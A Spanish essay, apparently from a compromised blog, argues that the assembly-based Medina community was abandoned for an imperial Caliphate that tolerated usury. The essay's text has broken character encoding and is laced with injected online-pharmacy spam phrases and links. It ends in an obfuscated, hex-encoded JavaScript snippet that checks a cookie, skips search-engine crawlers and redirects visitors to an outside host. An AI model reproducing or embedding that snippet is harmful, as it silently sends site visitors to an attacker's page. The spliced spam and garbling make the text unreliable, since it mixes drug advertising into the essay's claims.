Alkalima

Sobre el concepto islA?mico del poder en la Comunidad de Medina

Una pregunta a modo de prolegA?meno:

A?PodrAi??a una augmentin delivery shura mundial de la ummah en la que estuviesen representadas todas las tendencias del islam, incluidas las chiitas, sufAi??es y cualquiera de las derivadas de estas, emitir una fatua en la que se declarase fuera del islam al wahabismo?

La primera generaciA?n de musulmanes que conociA? al Profeta no solo tenAi??a la guAi??a de la RevelaciA?n aA?n viva de la que habAi??a sido testigo directamente, sino que ademA?s tenAi??a la del ejemplo de vida que el mismo Profeta Muhammad daba en cuanto a la posiciA?n que este ostentaba en el seno de la Comunidad de Medina, y de cA?mo esta favorecAi??a el desarrollo de una forma de organizaciA?n social muy sui generis en su Ai??poca.

El Profeta nunca fue un tirano, ni siquiera un gobernante en el sentido del tAi??rmino, pues gobernaba en Medina una asamblea en la que Ai??l era un miembro mA?s, pero a su muerte los musulmanes que en vida le conocieron imitaron no su ejemplo en la Comunidad social de Medina basada en una forma de gobierno democrA?tica y asamblearia, sino que volvieron sus ojos a las formas de gobierno que entonces imperaban entre persas y bizantinos.

1.- El prematuro eclipse de la Comunidad de Medina

Si la primera construcciA?n sociolA?gica que levantaron los musulmanes fue la Comunidad de Medina, la primera construcciA?n sociolA?gica que sentA? las bases del islam que hoy dAi??a conocemos no fue esa misma Comunidad de Medina, sino el Califato edificado a imagen y semejanza de la estructura geopolAi??tica de los imperios persa y bizantino. El Profeta no fue rey ni intentA? crear un estado militar con fines expansionistas, a pesar de lo cual con la entronizaciA?n del primer Califa tras su muerte se comenzaron a sentar las bases del islam que hoy en dAi??a conocemos. Esta construcciA?n sociolA?gica que es el islam de base califal algo negativo tendrAi??a en sus cimientos para haberse convertido en la tiranAi??a polAi??tica, econA?mica, religiosa, que hoy dAi??a rige en el islam, y que obviamente tiene bases histA?ricas.

El CorA?n no establece una determinada forma de gobierno, pero la prA?ctica de la Comunidad de Medina sAi?? lo transmitiA?, y sobre todo el ejemplo del Profeta Muhammad en el seno de esta, que no era obedecido como un rey, pues a pesar de lo que popularmente puede creerse las decisiones se tomaban en asamblea de la que el Profeta era parte, y durante ella el Profeta exponAi??a sus puntos de vista como un miembro mA?s. Esta forma de regir los destinos de la comunidad no significaba que se la privaba de tener un gobierno, o de defenderse de las agresiones externas, sino que ademA?s de defenderla de las agresiones externas se la defendAi??a tambiAi??n de la posibilidad de caer en manos de un tirano. Pero los compaAi??eros del Profeta no gobernaron como miembros de la asamblea de Medina sino como guAi??as coronados de los creyentes o califas, posicionA?ndose con ello en un puesto cuyo ejemplo no podrAi??an haberlo tomado de Muhammad, sino de los monarcas persas y bizantinos que eran sus enemigos.

No hay nada de inocencia en esta forma de gobierno asamblearia que era la Comunidad de Medina, sino de inteligencia al salvaguardar a los musulmanes de la tiranAi??a de los reyes. Se podAi??a gobernar perfectamente siguiendo las pautas establecidas por Muhammad en Medina, haberse defendido de las agresiones externas, y empezar a enseAi??ar a las comunidades vecinas que asAi?? es como debAi??an regirse, formando con ellas comunidades locales federadas. Medina se podAi??a haber de esta manera proyectado como ejemplo para las localidades vecinas. Los cimientos del islam se edificaron asAi?? sobre la construcciA?n sociolA?gica del califato, pero no sobre los cimientos establecidos en la Comunidad de Medina. La direcciA?n para una edificaciA?n sociolA?gica del islam era un sistema asambleario de gobierno indisociable del comercio sin usura, pero este se edificA? sobre el califato, sistema imperial de gobierno con economAi??a basada en la usura.

El islam como construcciA?n sociolA?gica de base corA?nica nunca llegA? pues a edificarse, porque a la muerte del Profeta Muhammad sus compaAi??eros decidieron edificar un islam de base califal, o sea, sobre una construcciA?n sociolA?gica que imitaba las dinA?micas geopolAi??ticas persas y bizantinas. La direcciA?n marcada por la Comunidad de Medina quedA? eclipsada a la muerte del Profeta Muhammad no llegando a implementarse nunca, renunciando a la posibilidad de haberse constituido en arquetipo sociolA?gico y geopolAi??tico que ante sus vecinos contrarrestase la visiA?n de persas y bizantinos basada en el espejismo de poder con el que estos imperios deslumbraron a los primeros lAi??deres musulmanes.

2.- El Pacto de Medina como prototipo de organizaciA?n asamblearia

La Comunidad de Medina se asentA? sobre unas bases jurAi??dicas que son conocidas como un documento histA?rico denominado Pacto de Medina. HabAi??a tres grandes comunidades entonces, musulmanes nativos de Medina, musulmanes emigrados, y los paganos, a ojos de los musulmanes. Era un pacto equitativo tripartito, que incluAi??a incluso a los no musulmanes en pie de igualdad con los musulmanes. El Pacto de Medina establecAi??a un sistema de gobierno basado en la shura buy thyroxine online uk o asamblea y en una economAi??a basada en un comercio exento de usura que era el prototipo de una forma de organizaciA?n social con fundamento corA?nico diseAi??ado para ser trasplantado a las comunidades vecinas, pero fue el islam califal el que se edificA? tras la muerte de Muhammad.

La Comunidad de Medina marcA? la direcciA?n hacia la que, si esa era su voluntad, los musulmanes debAi??an edificar su construcciA?n sociolA?gica para par con ella incidir en el mundo. Cada colectivo humano edifica construcciones sociolA?gicas para vivir en sociedad e incidir en el mundo. A los musulmanes se les mostrA? el ejemplo del profeta en la Comunidad de Medina para que les sirviese de guAi??a, pero tras su muerte aquellos musulmanes que tenAi??an la capacidad de decidir hacia quAi?? direcciA?n debAi??a dirigir la construcciA?n de su sociedad, ya sea la marcada por la Comunidad de Medina ya sea por cualquier otra, tomaron su decisiA?n libremente y, basA?ndose en ello, decidieron obviar la guAi??a de la Comunidad de Medina y decantarse por ai???otraai??? construcciA?n sociolA?gica, que fue el califato, inspirada en las estructuras de poder persas y bizantinas.

La Comunidad de Medina promovAi??a la disoluciA?n del poder jerA?rquico en su seno, procuraba una forma de organizaciA?n social que pudiese integrar a las distintas comunidades que la constituAi??an, al aceptar iguales derechos para musulmanes nativos, musulmanes emigrados y paganos, todo ello reflejado en el Pacto de Medina, asAi?? como promovAi??a tambiAi??n la gAi??nesis de un sistema econA?mico y financiero diferente al vigente en las tierras de los imperios persa y bizantino. ConstituyA? el prototipo sociolA?gico a travAi??s del cual se podAi??a haber superado el concepto de Estado, no ya por su configuraciA?n polAi??tica, que de una manera mA?s arcaica tambiAi??n se habAi??a manifestado en las polis griegas, sino por su configuraciA?n econA?mica. Y es este punto el que yo considero esencial: el de no disociar el asamblearismo polAi??tico del asamblearismo econA?mico y financiero.

La Comunidad de Medina no tenAi??a por quAi?? ser concebida como una meta idAi??lica petrificada en el tiempo a la que aspirar como ejemplo, sino como un punto de partida a travAi??s del cual desarrollar nuevas formas de organizaciA?n social, teniendo en cuenta la premisa de que las formas polAi??ticas locales debAi??an estar fusionadas con las estructuras financieras tambiAi??n locales, impidiendo con ello el desarrollo de estructuras polAi??ticas basadas en la idea de imperio. Pero este punto de partida se quedA? solo en eso al no haber pasado nunca de la fase embrionaria que comenzA? a gestarse en los tiempos en que Muhammad viviA? en la Comunidad de Medina. El islam sociolA?gico no fue levantado entonces sobre el prototipo diseAi??ado en Medina y, obviamente, pendiente de desarrollar, sino sobre el prototipo derivado de la mentalidad islamocrA?tica que supuso el Califato como espejo de los imperios persa y bizantino.

El Pacto de Medina, el instrumento legal que cimentA? la Comunidad de Medina, estableciA? las bases legales para gobernar la ciudad. Se gobernA? con pues con leyes consensuadas. Dicho consenso fue establecido sobre el principio del taaruf, where to buy zyprexa cheap acercamiento y conocimiento entre las comunidades humanas que conformaban Medina, cuya mA?xima manifestaciA?n fue la shura, a travAi??s de la que se ejercAi??a la consulta popular. En la Comunidad de Medina no habAi??a fiqh ni juristas (alfaquAi??es o fuqahas), ni siquiera son estos conceptos corA?nicos. Este consenso basado en el principio del taaruf y manifestado en el ejercicio del gobierno a travAi??s de la consulta en la shura constituyeron los principios rectores sobre los que se ejercAi??a el gobierno entonces en Medina.

El fundamento del taaruf y de la shura se encuentran en CorA?n 3:159, donde se vislumbre la praxis asamblearia en la cual se conmina a Muhammad a gobernar a travAi??s de la consulta, y tambiAi??n en CorA?n 42:36-39 donde se exhorta a los miembros de la comunidad a consultarse mutuamente para decidir sobre los asuntos que les ataAi??en y a defenderse tambiAi??n mutuamente cuando son vAi??ctimas de opresiA?n independientemente de la adscripciA?n religiosa a la que estAi??n adheridos.

No tiene sentido defender la idea de que la Comunidad de Medina no se gobernaba mediante la consulta sino que lo hacAi??a mediante los privilegios jerA?rquicos otorgados por http://ronyiswandi.mhs.narotama.ac.id/2018/03/15/purchase-penegra-reviews/ Allah a Muhammad. A?DesobedeciA? entonces Muhammad a Allah gobernando en Medina con los privilegios de un jerarca que no necesitaba gobernar mediante la consulta en asamblea?

3.- El Califato manipulA? las premisas financieras corA?nicas con el hiyal

El jurista y filA?sofo persa Al-Gazali (1058 ai??i?? 1111) escribiA? una obra enciclopAi??dica denominada La revivificaciA?n de las ciencias religiosas, donde recogiA? algunos capAi??tulos relativos a temas econA?micos, donde determinaba asuntos como las premisas que debAi??an sustentar el interAi??s pA?blico (maslaha), o donde hacAi??a una fuerte denuncia de las polAi??ticas de especulaciA?n financiera, ampliamente difundidas entonces, que incidAi??an en la manipulaciA?n de la moneda, que a su juicio debAi??a mantenerse estable (sunnah monetaria), y en la que denunciaba tambiAi??n la acumulaciA?n de dinero.

Una prA?ctica econA?mica tAi??pica de la especulaciA?n financiera que se practicaba en el orbe islA?mico era el hiyal, dispositivos legales de naturaleza ficticia que tenAi??an por objetivo crear un subterfugio de legalidad que permitiese saltarse la teA?rica prohibiciA?n de la riba. El hiyal de entonces tendrAi??a su proyecciA?n en el presente en las tAi??cnicas financieras utilizadas por la banca islA?mica para crear una ficciA?n legal respecto a que sus tAi??cnicas financieras respetan la prohibiciA?n corA?nica de la usura.

La prA?ctica del hiyal en la economAi??a y las tAi??cnicas financieras que han caracterizado toda la historia econA?mica del islam comenzaron siendo un hA?bito no institucionalizado, al no consistir en tAi??cnicas legales documentadas en tratados jurAi??dicos, pero hacia comienzos del siglo IX (tercero de la HAi??gira), empezaron a surgir tratados jurAi??dicos donde se detallaban procedimientos con tAi??cnicas del hiyal para poder compaginar la prA?ctica econA?mica y financiera fundamentada en la especulaciA?n con el principio corA?nico que prohibAi??a la baclofen tablets buy, buy zithromax online. riba. La especulaciA?n financiera estuvo desde los primeros tiempos del islam separada del concepto corA?nico que podAi??a abarcar la riba, y esta separaciA?n llegA? incluso a institucionalizarse a comienzos del siglo IX con el visto bueno de los juristas de mayor prestigio de la Ai??poca. El hiyal es el fundamento de la ocultaciA?n de la condena de la especulaciA?n financiera contenida en la RevelaciA?n, a travAi??s de la exhortaciA?n a evitarla como abominaciA?n que era, segA?n CorA?n 5:90.

La riba al-fadl, especulaciA?n financiera o maysir segA?n se desprende de CorA?n 5:90, estuvo siempre presente en la historia del islam sociolA?gico o califal. Los musulmanes inventaron muchas cosas que luego los europeos cristianos adoptaron e hicieron pasar como suyas, despreciando e ignorando su origen islA?mico por razones que seguro no se nos escapan. Y entre esos inventos musulmanes estaban por ejemplo el de las letras de cambio acutane 10 mg online purchase (sulfaya), cuya prA?ctica entraba dentro de la http://www.3karatt.com/21197 riba al-fadl o maysir (especulaciA?n financiera). Estas letras de cambio y otras tAi??cnicas derivadas de ellas estA?n en el origen de las corruptas prA?cticas de especulaciA?n financiera que los europeos cristianos harAi??an luego suyas y que les servirAi??an mA?s adelante para desarrollar el capitalismo financiero que luego acabarAi??an extendiendo por todo el mundo.

JamA?s histA?ricamente la economAi??a islA?mica ha funcionado sin riba (riba al-nasia, incremento con intercambio de bienes en tiempo diferido) o sin especulaciA?n financiera (riba al-fadl o maysir en CorA?n 5:90, incremento con intercambio de bienes en tiempo simultA?neo o con manipulaciones monetarias especulativas). La riba ha sido condenada por ulemas o juristas islA?micos, en menor medida que la especulaciA?n financiera por cuanto esta ha tenido mA?s detractores a la hora de considerarla haram, como lo ha sido por juristas de otras culturas monoteAi??stas o politeAi??stas histA?ricas. Pero en todas ellas, tanto la riba como la especulaciA?n financiera han sido prA?ctica habitual. Incluso los papas han condenado la usura, lo que supone un signo mA?s del carA?cter esperpAi??ntico de la susodicha condenan.

La condena mA?s antigua conocida a la usura, popularmente, se remonta a un texto indio del II milenio a.C., donde a esta se la denomina bekanaa?i??a en sA?nscrito vAi??dico (*). Pero esta referencia vAi??dica a la usura, a pesar de que asAi?? consta reflejada en una enciclopedia de internet muy popular, no es cientAi??ficamente correcta, pues los especialistas en sA?nscrito vAi??dico y religiones de la India consideran que la alusiA?n a la bekanata estA? en un himno del Mandala 8 (el 55) que figura entre los once himnos, entre seis y ocho para una minorAi??a de especialistas, considerados valakhilya (aunque no literalmente, es un tAi??rmino que viene a significar apA?crifo), pues se piensa fueron interpolados en Ai??poca posterior a la redacciA?n de los vedas. Un ensi de la ciudad-estado de Lagash llamado Urukagina (gobernA? entre 2380 a.C ai??i?? 2360 a.C. aprox. ), tiene atribuida por la arqueologAi??a la siguiente inscripciA?n, contenida en el cA?digo jurAi??dico que se conoce por su nombre, anterior en muchos siglos al CA?digo de Hammurabi.

ai???Ai??l liberA? a los habitantes de Lagash de usura, los controles onerosos, el hambre, el robo, el asesinato, y la incautaciA?n (de su propiedad y las personas). EstableciA? la libertad. La viuda y al huAi??rfano ya no estaban a la merced de un hombre poderosoai??? (CA?digo de Urukagina).

La especulaciA?n financiera siempre fue una prA?ctica de uso comA?n entre los comerciantes musulmanes. Por ello se ocultA? la exhortaciA?n corA?nica a evitar el maysir (especulaciA?n financiera) contenida en CorA?n 5:90, dA?ndole a la condena de la especulaciA?n financiera un carA?cter poco claro que solo se encontraba en algA?n hadiz, pero segA?n la tradiciA?n que se impuso, no lo estaba en el CorA?n. La tradiciA?n dice por ejemplo que el Profeta Muhammad muriA? exactamente despuAi??s de recogerse sus palabras en un hadiz sobre la riba al-fadl, y que por esta razA?n no llegA? a darle tiempo de explicar quAi?? era exactamente esa segunda riba a la que se referAi??a como al-fadl. Estas tAi??cnicas de especulaciA?n financiera tienen por tanto base en el islam califal o islamocracia.

(*) Rig-Veda, Libro (Mandala) 8, himno 55, verso 10

4.- Muhammad fue juez en Medina, no gobernante absoluto

El CorA?n habla de Muhammad de su condiciA?n de juez que ha de dirimir sobre las disputas basA?ndose en el espAi??ritu de la RevelaciA?n, pero no de su condiciA?n de gobernante absoluto. En los tiempos de la dAi??cada medinense, aA?n en vida de Muhammad, no habAi??a ninguna jurisprudencia desarrollada, ni juristas o ulemas a los que acudir para dirimir judicialmente sobre una disputa que enfrentase a dos parte, por ello El CorA?n les dice a los creyentes que en materia de disputas deben remitirse al Profeta y obedecer las decisiones que al respecto este sancione, por ello Muhammad hizo de juez entre los musulmanes.

ai???Juro que no se consideraran verdaderos creyentes a menos que te acepten como juez de sus disputas; y no se resistan a aceptar tu decisiA?n y se sometan completamenteai??? CorA?n 4:65.

Cuando el CorA?n habla de la obediencia que los creyentes deben a Muhammad no lo hace pues posicionando al Profeta como un lAi??der polAi??tico al que se le deba obediencia ciega, pues esta idea es totalmente ajena al CorA?n, sino que lo hace posicionA?ndolo como juez que ha de dirimir acerca de los asuntos sobre los que los miembros de la Comunidad discrepan (CorA?n 4:65). Los musulmanes de la dAi??cada de Medina parece que comprendieron perfectamente la distinciA?n del profeta como juez al que debAi??an elevar sus disputas.

El CorA?n conmina a Muhammad a legislar mediante el mAi??todo de la consulta en asamblea o shura (CorA?n 3:159), asAi?? como exhorta tambiAi??n a los creyentes a legislar mediante la consulta en asamblea (CorA?n 42:38), lo que da idea de la concepciA?n del ejercicio del poder que se trasmite en la RevelaciA?n corA?nica que claramente sanciona una separaciA?n entre lo judicial y lo legislativo que solo habrAi??a tenido implementaciA?n en la dAi??cada medinense que conociA? a Muhammad en vida. Esta RevelaciA?n diluye el potencial del poder ejecutivo en el legislativo al conminar a Muhammad a consultar en asamblea con los otros miembros de la Comunidad (CorA?n 3:159), hecho que supone la esencia de la horizontalidad del poder sancionada en la RevelaciA?n en contraposiciA?n al posibilismo histA?ricamente vigente que sanciona una verticalidad del poder que se encuentra tambiAi??n en la esencia del Califato surgido en imitaciA?n de los imperios persa y bizantino.

SegA?n la RevelaciA?n corA?nica Muhammad debAi??a ser obedecido en lo que se refiere a dirimir sobre asuntos relativos al fiqh (CorA?n 4:59 y 4:65), pues no habAi??a entonces ningA?n fiqh desarrollado ni juristas que sostuviesen el mismo durante los diez aAi??os en que Muhammad dirigiA? la Comunidad de Medina. Si ni el Profeta se atribuyA? para sAi?? la supremacAi??a de los gobernantes absolutos, A?por quAi?? sAi?? lo hicieron aquellos que aceptaron revestirse con la calidad de Califa tras su muerte?var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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